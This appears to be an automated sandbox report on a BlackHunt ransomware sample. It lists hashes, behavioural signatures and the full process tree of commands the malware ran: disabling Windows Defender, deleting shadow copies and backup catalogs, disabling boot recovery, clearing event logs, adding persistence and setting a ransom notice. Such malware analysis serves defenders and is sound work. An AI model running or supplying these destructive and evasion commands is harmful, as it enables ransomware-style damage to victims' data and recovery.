Analysis
max time kernel: 118s
max time network: 150s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 18/01/2024, 22:44
Static task: static1
Behavioral task: behavioral1
  Sample: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe
  Resource: win10v2004-20231222-en
General
Target: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe
Size: 707KB
MD5: e6e042228afcc18239f234c4e9d44d55
SHA1: bfec002de8e368ea515c656a9cc8c200f357b0eb
SHA256: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5
SHA512: 50447dbb92b15d5f332cbd4129b7dcadd0e04849f6bf1c75a94f19bf49f7903c9a2a98bb47e48c32f91bdd3dc8e5912689b11853fdb94e06d1a246b754663aa6
SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1T8xvnh:6uaTmkZJ+naie5OTamgEoKxLWSlh
Malware Config
Extracted from: C:\ProgramData\#BlackHunt_ReadMe.hta
- http-equiv="x-ua-compatible"
- http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures

Deletes NTFS Change Journal (2 TTPs, 2 IoCs)
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
Processes: fsutil.exe (PID 1440), fsutil.exe (PID 2400)

Modifies Windows Defender Real-time Protection settings
- Key created: \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" (reg.exe)

- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)
Clears Windows event logs (1 TTPs, 5 IoCs)
Processes: wevtutil.exe (PIDs 1992, 688, 884, 1756, 2384)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTPs, 4 IoCs)
Processes: bcdedit.exe (PIDs 2364, 2568, 1716, 436)
Renames multiple (2878) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

Processes: wbadmin.exe (PID 328), wbadmin.exe (PID 3004)

Disables Task Manager via registry modification

Disables use of System Restore points (1 TTPs)

Deletes itself (1 IoCs)
Processes: cmd.exe (PID 2936)

Adds Run key to start application (2 TTPs, 1 IoCs)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" (reg.exe)

- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)
Enumerates connected drives (3 TTPs, 27 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Flow 2: ip-api.com

Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
- Set value (str): \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" (20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)

Drops file in Program Files directory (64 IoCs)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe (PID 1580)

Interacts with shadow copies (2 TTPs, 6 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe (PIDs 1704, 588, 472, 1768, 2220, 2512)

Kills process with taskkill (1 IoCs)
Processes: taskkill.exe (PID 2724)

- Key created: \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Main (mshta.exe)

Modifies registry class (10 IoCs)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon (reg.exe)
- Key created: \REGISTRY\MACHINE\Software\Classes\Hunt2 (reg.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ (reg.exe)
- Key created: \REGISTRY\MACHINE\Software\Classes\.Hunt2 (reg.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ (reg.exe)
- Key created: \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon (reg.exe)
- Key created: \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 (reg.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" (reg.exe)

Runs ping.exe (1 TTPs, 1 IoCs)
Processes: PING.EXE (PID 2792)

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
Processes: mshta.exe (PID 1276)
Suspicious use of AdjustPrivilegeToken (24 IoCs)
- 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe (PID 2664): SeDebugPrivilege, SeRestorePrivilege, SeBackupPrivilege, SeTakeOwnershipPrivilege, SeAuditPrivilege, SeSecurityPrivilege, SeIncBasePriorityPrivilege
- wbengine.exe (PID 2908): SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege
- vssvc.exe (PID 2716): SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
- wevtutil.exe (PIDs 2384, 688, 884, 1756, 1992): SeSecurityPrivilege and SeBackupPrivilege for each instance
- taskkill.exe (PID 2724): SeDebugPrivilege

Suspicious use of WriteProcessMemory (64 IoCs)
System policy modification (1 TTPs, 3 IoCs)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" (20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe)

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
- C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe (PID 2664)
  Command line: "C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe"
  Signatures: UAC bypass; Checks whether UAC is enabled; Enumerates connected drives; Sets desktop wallpaper using registry; Drops file in Program Files directory; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory; System policy modification
  - C:\Windows\System32\cmd.exe (PID 2724)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\reg.exe (PID 2812)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
      Signatures: Modifies registry class
  - C:\Windows\System32\cmd.exe (PID 2784)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\reg.exe (PID 2708)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      Signatures: Modifies registry class
  - C:\Windows\System32\cmd.exe (PID 2848)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\reg.exe (PID 2852)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
      Signatures: Modifies registry class
  - C:\Windows\System32\cmd.exe (PID 3000)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\reg.exe (PID 2108)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      Signatures: Modifies registry class
  - C:\Windows\System32\cmd.exe (PID 2292)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\reg.exe (PID 1668)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
      Signatures: Adds Run key to start application
  - C:\Windows\System32\cmd.exe (PID 2608)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    - C:\Windows\system32\reg.exe (PID 2952)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
  - C:\Windows\System32\cmd.exe (PID 2972)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    - C:\Windows\system32\reg.exe (PID 2956)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      Signatures: Modifies Windows Defender Real-time Protection settings
  - C:\Windows\System32\cmd.exe (PID 2748)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
    - C:\Windows\system32\reg.exe (PID 484)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
  - C:\Windows\System32\cmd.exe (PID 2636)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
    - C:\Windows\system32\reg.exe (PID 2976)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
  - C:\Windows\System32\cmd.exe (PID 2800)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
    - C:\Windows\system32\reg.exe (PID 1788)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
  - C:\Windows\System32\cmd.exe (PID 2632)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
    - C:\Windows\system32\reg.exe (PID 892)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
  - C:\Windows\System32\cmd.exe (PID 2112)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
    - C:\Windows\system32\reg.exe (PID 1508)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
  - C:\Windows\System32\cmd.exe (PID 2232)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
    - C:\Windows\system32\reg.exe (PID 2680)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
  - C:\Windows\System32\cmd.exe (PID 2096)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
    - C:\Windows\system32\reg.exe (PID 2944)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
  - C:\Windows\System32\cmd.exe (PID 2040)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
    - C:\Windows\system32\reg.exe (PID 1312)
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2208
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2932
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2920
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2940
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1912
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2652
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1620
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1320
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2256
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2240
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:760
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1832
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2168
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2908
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe" /F2⤵PID:2880
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe" /F3⤵
- Creates scheduled task(s)
PID:1580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1532
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:708
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2440
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2248
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2268
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1504
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:816
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1432
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:544
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1860
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1456
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:2308
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:2692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2816
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:2068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2560
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2860
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1656
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1052
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:332
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:1612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2224
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:2996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2008
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2000
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1572
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3060
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:1720
-
-
